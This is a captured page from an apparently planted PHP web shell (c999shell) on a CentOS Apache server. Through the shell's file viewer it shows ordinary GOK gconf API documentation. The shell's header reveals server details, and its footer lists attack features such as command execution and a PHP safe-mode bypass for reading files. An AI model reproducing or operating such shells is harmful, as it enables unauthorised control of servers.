Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/gok/ drwxr-xr-x |
Viewing file: gok-gok-gconf.html (11.55 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Synopsisgboolean gok_gconf_get_int (GConfClient *client, const gchar *key, gint *dest); gboolean gok_gconf_set_int (GConfClient *client, const gchar *key, gint value); gboolean gok_gconf_get_bool (GConfClient *client, const gchar *key, gboolean *dest); gboolean gok_gconf_set_bool (GConfClient *client, const gchar *key, gboolean value); gboolean gok_gconf_get_string (GConfClient *client, const gchar *key, gchar **dest); gboolean gok_gconf_set_string (GConfClient *client, const gchar *key, const gchar *value); Detailsgok_gconf_get_int ()gboolean gok_gconf_get_int (GConfClient *client, const gchar *key, gint *dest); Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged.
gok_gconf_set_int ()gboolean gok_gconf_set_int (GConfClient *client, const gchar *key, gint value); Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.
gok_gconf_get_bool ()gboolean gok_gconf_get_bool (GConfClient *client, const gchar *key, gboolean *dest); Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged.
gok_gconf_set_bool ()gboolean gok_gconf_set_bool (GConfClient *client, const gchar *key, gboolean value); Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.
gok_gconf_get_string ()gboolean gok_gconf_get_string (GConfClient *client, const gchar *key, gchar **dest); Retrieves the requested key and stores it in the given dest. If an error occurs during retreiving the key a message is logged using gok_log_x and dest is left unchanged. NOTE: *dest needs to be freed when finished with.
gok_gconf_set_string ()gboolean gok_gconf_set_string (GConfClient *client, const gchar *key, const gchar *value); Stores the given (key, value) pair if it is different from what is in GConf already. If an error occurs during storing the key a message is logged using gok_log_x.
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0122 ]-- |